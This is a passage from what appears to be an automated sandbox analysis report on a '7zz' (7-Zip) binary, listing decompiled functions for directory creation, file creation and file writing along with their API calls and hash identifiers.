							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 0xb;
						} else {
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							_t236 =  *(_t238 + 0x10);
							 *(_t238 - 4) = 9;
						}
					} else {
						_t160 = E00409D7C( *((intOrPtr*)(_t238 - 0x34))); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						} else {
							_t236 = GetLastError();
							__eflags = _t236 - _t185;
							if(_t236 == _t185) {
								_t236 = 0x80004005;
							}
							_t162 = E00403532(_t238 - 0x28, L"Can not create output directory ");
							_push(_t238 - 0x34);
							 *(_t238 - 4) = 6;
							_t163 = E0040B0A0(_t238 - 0x40, _t162);
							 *(_t238 - 4) = 7;
							E00401E26( *((intOrPtr*)(_t238 + 0x1c)), _t163);
							E00407A18( *((intOrPtr*)(_t238 - 0x40)));
							E00407A18( *(_t238 - 0x28));
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 8;
						}
					}
					E0040862D();
					 *(_t238 - 4) = _t185;
					E00408604(_t238 - 0x6c);
					goto L33;
				} else {
					_t169 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, _t238 - 0x18);
					if(_t169 == 0) {
						__eflags =  *(_t238 - 0x18);
						 *((intOrPtr*)(_t238 - 0x10)) = 0;
						if( *(_t238 - 0x18) <= 0) {
							L9:
							__eflags =  *((intOrPtr*)(_t238 - 0x50)) - _t185;
							if( *((intOrPtr*)(_t238 - 0x50)) != _t185) {
								goto L13;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x2c))();
								goto L11;
							}
						} else {
							while(1) {
								 *(_t238 - 0x28) = _t185;
								 *(_t238 - 0x24) = _t185;
								 *(_t238 - 0x20) = _t185;
								E00401E9A(_t238 - 0x28, 3);
								_push(_t238 - 0x28);
								 *(_t238 - 4) = 1;
								_push( *((intOrPtr*)(_t238 - 0x10)));
								_t175 = E004179F7( *((intOrPtr*)(_t238 - 0x14)));
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								}
								_t175 = E004179E9(_t238 + 0x13);
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t238 + 0x13)) - _t185;
									_t180 = E00408E6D( *((intOrPtr*)(_t238 + 0x13)) - _t185, _t238 - 0x28, _t175 & 0xffffff00 |  *((intOrPtr*)(_t238 + 0x13)) == _t185);
									__eflags = _t180;
									if(_t180 != 0) {
										E00415C6D(_t238 - 0x58,  *((intOrPtr*)(_t238 - 0x10)));
									}
									 *(_t238 - 4) = _t185;
									E00407A18( *(_t238 - 0x28));
									 *((intOrPtr*)(_t238 - 0x10)) =  *((intOrPtr*)(_t238 - 0x10)) + 1;
									__eflags =  *((intOrPtr*)(_t238 - 0x10)) -  *(_t238 - 0x18);
									if( *((intOrPtr*)(_t238 - 0x10)) <  *(_t238 - 0x18)) {
										continue;
									} else {
										goto L9;
									}
								}
								goto L34;
							}
							_t236 = _t175;
							E00407A18( *(_t238 - 0x28));
							L33:
							_t117 = _t238 - 4;
							 *_t117 =  *(_t238 - 4) | 0xffffffff;
							__eflags =  *_t117;
							E00408604(_t238 - 0x58);
							_t153 = _t236;
						}
					} else {
						_t185 = _t169;
						L11:
						 *(_t238 - 4) =  *(_t238 - 4) | 0xffffffff;
						E00408604(_t238 - 0x58);
						_t153 = _t185;
					}
				}
				L34:
				 *[fs:0x0] =  *((intOrPtr*)(_t238 - 0xc));
				return _t153;
			}
























                                                                      0x00416927
                                                                      0x0041692f
                                                                      0x00416933
                                                                      0x00416936
                                                                      0x00416939
                                                                      0x0041693c
                                                                      0x0041693e
                                                                      0x00416941
                                                                      0x00416949
                                                                      0x0041694e
                                                                      0x00416955
                                                                      0x00416958
                                                                      0x0041695d
                                                                      0x00416a25
                                                                      0x00416a2a
                                                                      0x00416a2f
                                                                      0x00416a3d
                                                                      0x00416a41
                                                                      0x00416a4e
                                                                      0x00416a52
                                                                      0x00416a5d
                                                                      0x00416a64
                                                                      0x00416a71
                                                                      0x00416a75
                                                                      0x00416a7d
                                                                      0x00416a85
                                                                      0x00416a89
                                                                      0x00416a8e
                                                                      0x00416a93
                                                                      0x00416b09
                                                                      0x00416b30
                                                                      0x00416b36
                                                                      0x00416b3b
                                                                      0x00416b40
                                                                      0x00416b45
                                                                      0x00416b47
                                                                      0x00416b4a
                                                                      0x00416b68
                                                                      0x00416b6b
                                                                      0x00416b77
                                                                      0x00416b77
                                                                      0x00416b6d
                                                                      0x00416b6d
                                                                      0x00416b70
                                                                      0x00000000
                                                                      0x00416b72
                                                                      0x00416b72
                                                                      0x00416b74
                                                                      0x00416b74
                                                                      0x00416b70
                                                                      0x00416b79
                                                                      0x00416b7c
                                                                      0x00416b7e
                                                                      0x00416b80
                                                                      0x00416b81
                                                                      0x00416bde
                                                                      0x00416b83
                                                                      0x00416b8a
                                                                      0x00416b8c
                                                                      0x00416b90
                                                                      0x00416b9d
                                                                      0x00416ba1
                                                                      0x00416ba4
                                                                      0x00416ba6
                                                                      0x00416ba8
                                                                      0x00416bad
                                                                      0x00416bb6
                                                                      0x00416bb9
                                                                      0x00416bbe
                                                                      0x00416bc1
                                                                      0x00416bc3
                                                                      0x00416baf
                                                                      0x00416baf
                                                                      0x00416bb4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00416bb4
                                                                      0x00416bad
                                                                      0x00416bc9
                                                                      0x00416bcd
                                                                      0x00416bcd
                                                                      0x00416be9
                                                                      0x00416bee
                                                                      0x00416bf4
                                                                      0x00416bfb
                                                                      0x00416b4c
                                                                      0x00416b4f
                                                                      0x00416b55
                                                                      0x00416b5c
                                                                      0x00416b5f
                                                                      0x00416b5f
                                                                      0x00416a95
                                                                      0x00416a98
                                                                      0x00416a9d
                                                                      0x00416a9f
                                                                      0x00000000
                                                                      0x00416aa1
                                                                      0x00416aa7
                                                                      0x00416aa9
                                                                      0x00416aab
                                                                      0x00416aad
                                                                      0x00416aad
                                                                      0x00416aba
                                                                      0x00416ac4
                                                                      0x00416ac8
                                                                      0x00416acc
                                                                      0x00416ad5
                                                                      0x00416ad9
                                                                      0x00416ae1
                                                                      0x00416ae9
                                                                      0x00416af1
                                                                      0x00416af9
                                                                      0x00416b00
                                                                      0x00416b00
                                                                      0x00416a9f
                                                                      0x00416c02
                                                                      0x00416c0a
                                                                      0x00416c0d
                                                                      0x00000000
                                                                      0x00416963
                                                                      0x0041696a
                                                                      0x0041696f
                                                                      0x00416978
                                                                      0x0041697b
                                                                      0x0041697e
                                                                      0x004169f5
                                                                      0x004169f5
                                                                      0x004169f8
                                                                      0x00000000
                                                                      0x004169fa
                                                                      0x004169ff
                                                                      0x00000000
                                                                      0x004169ff
                                                                      0x00416980
                                                                      0x00416980
                                                                      0x00416985
                                                                      0x00416988
                                                                      0x0041698b
                                                                      0x0041698e
                                                                      0x00416999
                                                                      0x0041699a
                                                                      0x0041699e
                                                                      0x004169a1
                                                                      0x004169a6
                                                                      0x004169a8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004169b3
                                                                      0x004169b8
                                                                      0x004169ba
                                                                      0x00000000
                                                                      0x004169bc
                                                                      0x004169bc
                                                                      0x004169ca
                                                                      0x004169cf
                                                                      0x004169d1
                                                                      0x004169d9
                                                                      0x004169d9
                                                                      0x004169e1
                                                                      0x004169e4
                                                                      0x004169e9
                                                                      0x004169f0
                                                                      0x004169f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004169f3
                                                                      0x00000000
                                                                      0x004169ba
                                                                      0x00416a18
                                                                      0x00416a1a
                                                                      0x00416c12
                                                                      0x00416c12
                                                                      0x00416c12
                                                                      0x00416c12
                                                                      0x00416c19
                                                                      0x00416c1e
                                                                      0x00416c1e
                                                                      0x00416971
                                                                      0x00416971
                                                                      0x00416a02
                                                                      0x00416a02
                                                                      0x00416a09
                                                                      0x00416a0e
                                                                      0x00416a0e
                                                                      0x0041696f
                                                                      0x00416c20
                                                                      0x00416c26
                                                                      0x00416c2e

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00416927
                                                                      • GetLastError.KERNEL32(?,00000000,0048BB7C,?,00000004,00000004,?,00000000,00000000), ref: 00416AA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast
                                                                      • String ID: 59@$Can not create output directory
                                                                      • API String ID: 1057991267-3326608674
                                                                      • Opcode ID: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
                                                                      • Instruction ID: 6de5a34db444ab3dab8a47dd72c1d742a8883a30c047269dba67d70d491f02d0
                                                                      • Opcode Fuzzy Hash: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
                                                                      • Instruction Fuzzy Hash: E0A1C171D04249EFCF10EFA4C9419EEBBB4AF18308F14446EE455B7291DB38AE45CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00470330 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2088 470330-470347 2089 470350-470370 2088->2089 2090 470349-47034b 2088->2090 2092 470372-47037d call 4716c1 2089->2092 2093 470380-470388 2089->2093 2091 4704b6-4704ba 2090->2091 2092->2093 2095 47044f-470464 WriteFile 2093->2095 2096 47038e-47039a 2093->2096 2100 470466-47046f 2095->2100 2101 470471-47047a GetLastError 2095->2101 2098 4703a0 2096->2098 2099 47048a-470491 2096->2099 2104 4703a6-4703af 2098->2104 2102 470493-470499 2099->2102 2103 47049f-4704b1 call 470646 call 47064f 2099->2103 2105 470418-47041d 2100->2105 2101->2105 2102->2090 2102->2103 2126 470485-470488 2103->2126 2109 4703b1-4703bc 2104->2109 2110 4703da-4703ff WriteFile 2104->2110 2106 4704b3 2105->2106 2107 470423-470426 2105->2107 2106->2091 2107->2099 2111 470428-47042e 2107->2111 2113 4703c5-4703d8 2109->2113 2114 4703be-4703c4 2109->2114 2115 470444-47044d GetLastError 2110->2115 2116 470401-470409 2110->2116 2117 470430-470442 call 470646 call 47064f 2111->2117 2118 47047c-470484 call 4705d3 2111->2118 2113->2104 2113->2110 2114->2113 2120 470416 2115->2120 2116->2120 2121 47040b-470414 2116->2121 2117->2126 2118->2126 2120->2105 2121->2098 2121->2120 2126->2091
                                                                      C-Code - Quality: 100%
                                                                      			E00470330(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x496460 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E004716C1(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00470646())) = 0x1c;
								_t73 = E0047064F();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004705D3(_a4);
						} else {
							 *((intOrPtr*)(E00470646())) = 9;
							_t73 = E0047064F();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0); // executed
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}























                                                                      0x0047033c
                                                                      0x00470341
                                                                      0x00470344
                                                                      0x00470347
                                                                      0x00470356
                                                                      0x00470368
                                                                      0x0047036b
                                                                      0x00470370
                                                                      0x00470378
                                                                      0x0047037d
                                                                      0x00470382
                                                                      0x00470384
                                                                      0x00470388
                                                                      0x0047045c
                                                                      0x00470462
                                                                      0x00470464
                                                                      0x00470477
                                                                      0x00470466
                                                                      0x00470469
                                                                      0x0047046c
                                                                      0x0047046c
                                                                      0x00470418
                                                                      0x00470418
                                                                      0x0047041b
                                                                      0x0047041d
                                                                      0x004704b3
                                                                      0x004704b3
                                                                      0x00000000
                                                                      0x004704b3
                                                                      0x00470423
                                                                      0x00470426
                                                                      0x0047048a
                                                                      0x0047048a
                                                                      0x0047048c
                                                                      0x00470491
                                                                      0x0047049f
                                                                      0x004704a4
                                                                      0x004704aa
                                                                      0x004704af
                                                                      0x00470485
                                                                      0x00000000
                                                                      0x00470485
                                                                      0x00470496
                                                                      0x00470499
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470499
                                                                      0x0047042a
                                                                      0x0047042b
                                                                      0x0047042e
                                                                      0x0047047f
                                                                      0x00470430
                                                                      0x00470435
                                                                      0x0047043b
                                                                      0x00470440
                                                                      0x00470440
                                                                      0x00000000
                                                                      0x0047042e
                                                                      0x00470391
                                                                      0x00470394
                                                                      0x00470397
                                                                      0x0047039a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004703a0
                                                                      0x004703a0
                                                                      0x004703a0
                                                                      0x004703a6
                                                                      0x004703ac
                                                                      0x004703af
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004703b4
                                                                      0x004703b7
                                                                      0x004703b9
                                                                      0x004703bc
                                                                      0x004703be
                                                                      0x004703c1
                                                                      0x004703c4
                                                                      0x004703c4
                                                                      0x004703c4
                                                                      0x004703c5
                                                                      0x004703c7
                                                                      0x004703d2
                                                                      0x004703d2
                                                                      0x004703e2
                                                                      0x004703f7
                                                                      0x004703fd
                                                                      0x004703ff
                                                                      0x0047044a
                                                                      0x00000000
                                                                      0x0047044a
                                                                      0x00470401
                                                                      0x00470404
                                                                      0x00470407
                                                                      0x00470409
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470411
                                                                      0x00470411
                                                                      0x00470416
                                                                      0x00470416
                                                                      0x00000000
                                                                      0x00470416
                                                                      0x00470349
                                                                      0x00000000

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,?), ref: 004703F7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                      • Instruction ID: f9a8e47d18844c341b85913162919efea3dfe28df8f23c4564b581e76a5f4db2
                                                                      • Opcode Fuzzy Hash: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
                                                                      • Instruction Fuzzy Hash: AE518D71901218EFCB11CF68C984ADE7BB4EF81340F10C5AAE91D9B251D738DA50CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B8BF Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2130 40b8bf-40b8d8 call 46b890 2133 40b931-40b93a call 40b9c0 2130->2133 2134 40b8da-40b92f call 403532 AreFileApisANSI call 40822f call 40b882 call 407a18 * 2 2130->2134 2139 40b9b0-40b9bd 2133->2139 2140 40b93c-40b95b CreateFileW 2133->2140 2134->2139 2142 40b9a4-40b9ad 2140->2142 2143 40b95d-40b984 call 401e9a call 40b863 2140->2143 2142->2139 2154 40b986-40b999 CreateFileW 2143->2154 2155 40b99b-40b9a3 call 407a18 2143->2155 2154->2155 2155->2142
                                                                      C-Code - Quality: 86%
                                                                      			E0040B8BF(void** __ecx) {
				signed int _t37;
				void* _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr* _t48;
				signed int _t50;
				void** _t74;
				void* _t76;
				intOrPtr _t81;

				E0046B890(0x473e14, _t76);
				_t81 =  *0x490a7c; // 0x1
				_t74 = __ecx;
				if(_t81 != 0) {
					_t37 = E0040B9C0(__ecx);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = CreateFileW( *(_t76 + 8),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0); // executed
						__eflags = _t38 - 0xffffffff;
						 *_t74 = _t38;
						if(_t38 == 0xffffffff) {
							 *(_t76 - 0x18) = 0;
							 *((intOrPtr*)(_t76 - 0x14)) = 0;
							 *((intOrPtr*)(_t76 - 0x10)) = 0;
							E00401E9A(_t76 - 0x18, 3);
							 *((intOrPtr*)(_t76 - 4)) = 2;
							_t41 = E0040B863(_t76 - 0x18);
							__eflags = _t41;
							if(_t41 != 0) {
								 *_t74 = CreateFileW( *(_t76 - 0x18),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0);
							}
							E00407A18( *(_t76 - 0x18));
						}
						__eflags =  *_t74 - 0xffffffff;
						_t74[1] = 0;
						_t33 =  *_t74 != 0xffffffff;
						__eflags = _t33;
						_t37 = 0 | _t33;
					}
				} else {
					E00403532(_t76 - 0x24,  *(_t76 + 8));
					 *((intOrPtr*)(_t76 - 4)) = 0;
					_t45 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t45 + 1);
					_t48 = E0040822F(_t76 - 0x30);
					 *((char*)(_t76 - 4)) = 1;
					_t50 = E0040B882(_t74, _t81,  *_t48,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14),  *(_t76 + 0x18));
					E00407A18( *((intOrPtr*)(_t76 - 0x30)));
					E00407A18( *((intOrPtr*)(_t76 - 0x24)));
					_t37 = _t50;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t37;
			}












                                                                      0x0040b8c4
                                                                      0x0040b8cf
                                                                      0x0040b8d6
                                                                      0x0040b8d8
                                                                      0x0040b933
                                                                      0x0040b938
                                                                      0x0040b93a
                                                                      0x0040b954
                                                                      0x0040b956
                                                                      0x0040b959
                                                                      0x0040b95b
                                                                      0x0040b962
                                                                      0x0040b965
                                                                      0x0040b968
                                                                      0x0040b96b
                                                                      0x0040b976
                                                                      0x0040b97d
                                                                      0x0040b982
                                                                      0x0040b984
                                                                      0x0040b999
                                                                      0x0040b999
                                                                      0x0040b99e
                                                                      0x0040b9a3
                                                                      0x0040b9a6
                                                                      0x0040b9a9
                                                                      0x0040b9ad
                                                                      0x0040b9ad
                                                                      0x0040b9ad
                                                                      0x0040b9ad
                                                                      0x0040b8da
                                                                      0x0040b8e0
                                                                      0x0040b8e5
                                                                      0x0040b8e8
                                                                      0x0040b8f0
                                                                      0x0040b8f9
                                                                      0x0040b8fa
                                                                      0x0040b906
                                                                      0x0040b914
                                                                      0x0040b91e
                                                                      0x0040b926
                                                                      0x0040b92c
                                                                      0x0040b92e
                                                                      0x0040b9b5
                                                                      0x0040b9bd

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040B8C4
                                                                      • AreFileApisANSI.KERNEL32(?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B8E8
                                                                        • Part of subcall function 0040B882: CreateFileA.KERNEL32(?,00000000,?,00000000,?,?,00000000,?,?,0040B919,?,00000001,?,?,?,00000001), ref: 0040B8A4
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,0040B46E,00000000,00000000,?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?), ref: 0040B954
                                                                      • CreateFileW.KERNEL32(?,00000003,00000000,00000000,?,?,00000000,00000003), ref: 0040B997
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: File$Create$ApisH_prolog
                                                                      • String ID:
                                                                      • API String ID: 1948390111-0
                                                                      • Opcode ID: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
                                                                      • Instruction ID: 89dc2ad9e147b491d0c4ff48465b06effa766152703dd1648aaffece476b04d2
                                                                      • Opcode Fuzzy Hash: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
                                                                      • Instruction Fuzzy Hash: 91318E72900209EFCF01AFA4DD418EEBB76EF58354F10452EF551772A1C7398A64DB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409CCB Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2159 409ccb-409ce5 call 46b890 2162 409d07-409d13 CreateDirectoryW 2159->2162 2163 409ce7-409d05 call 409ad5 call 409cbc call 407a18 2159->2163 2165 409d15-409d17 2162->2165 2166 409d19-409d24 GetLastError 2162->2166 2170 409d6d-409d7b 2163->2170 2165->2170 2167 409d26-409d48 call 401e9a call 40b863 2166->2167 2168 409d6b 2166->2168 2179 409d62-409d6a call 407a18 2167->2179 2180 409d4a-409d60 CreateDirectoryW call 407a18 2167->2180 2168->2170 2179->2168 2180->2170
                                                                      C-Code - Quality: 100%
                                                                      			E00409CCB(WCHAR* __ecx) {
				int _t17;
				signed int _t19;
				int _t23;
				signed int _t26;
				void* _t50;
				intOrPtr _t55;

				E0046B890(E00473A84, _t50);
				_t55 =  *0x490a7c; // 0x1
				if(_t55 != 0) {
					_t17 = CreateDirectoryW(__ecx, 0); // executed
					if(_t17 == 0) {
						if(GetLastError() == 0xb7) {
							L8:
							_t19 = 0;
						} else {
							 *(_t50 - 0x18) = 0;
							 *((intOrPtr*)(_t50 - 0x14)) = 0;
							 *((intOrPtr*)(_t50 - 0x10)) = 0;
							E00401E9A(_t50 - 0x18, 3);
							 *((intOrPtr*)(_t50 - 4)) = 0;
							if(E0040B863(_t50 - 0x18) == 0) {
								E00407A18( *(_t50 - 0x18));
								goto L8;
							} else {
								_t23 = CreateDirectoryW( *(_t50 - 0x18), 0);
								_t19 = E00407A18( *(_t50 - 0x18)) & 0xffffff00 | _t23 != 0x00000000;
							}
						}
					} else {
						_t19 = 1;
					}
				} else {
					_t26 = E00409CBC( *((intOrPtr*)(E00409AD5(_t50 - 0x24, __ecx))));
					E00407A18( *((intOrPtr*)(_t50 - 0x24)));
					_t19 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t19;
			}









                                                                      0x00409cd0
                                                                      0x00409cdb
                                                                      0x00409ce5
                                                                      0x00409d0f
                                                                      0x00409d13
                                                                      0x00409d24
                                                                      0x00409d6b
                                                                      0x00409d6b
                                                                      0x00409d26
                                                                      0x00409d2b
                                                                      0x00409d2e
                                                                      0x00409d31
                                                                      0x00409d34
                                                                      0x00409d3e
                                                                      0x00409d48
                                                                      0x00409d65
                                                                      0x00000000
                                                                      0x00409d4a
                                                                      0x00409d4e
                                                                      0x00409d5d
                                                                      0x00409d5d
                                                                      0x00409d48
                                                                      0x00409d15
                                                                      0x00409d15
                                                                      0x00409d15
                                                                      0x00409ce7
                                                                      0x00409cf3
                                                                      0x00409cfd
                                                                      0x00409d03
                                                                      0x00409d03
                                                                      0x00409d73
                                                                      0x00409d7b

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00409CD0
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0000005C,?,00000000), ref: 00409D0F
                                                                        • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                        • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                        • Part of subcall function 00409CBC: CreateDirectoryA.KERNEL32(?,00000000,00409CF8,0000005C,?,00000000), ref: 00409CBF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
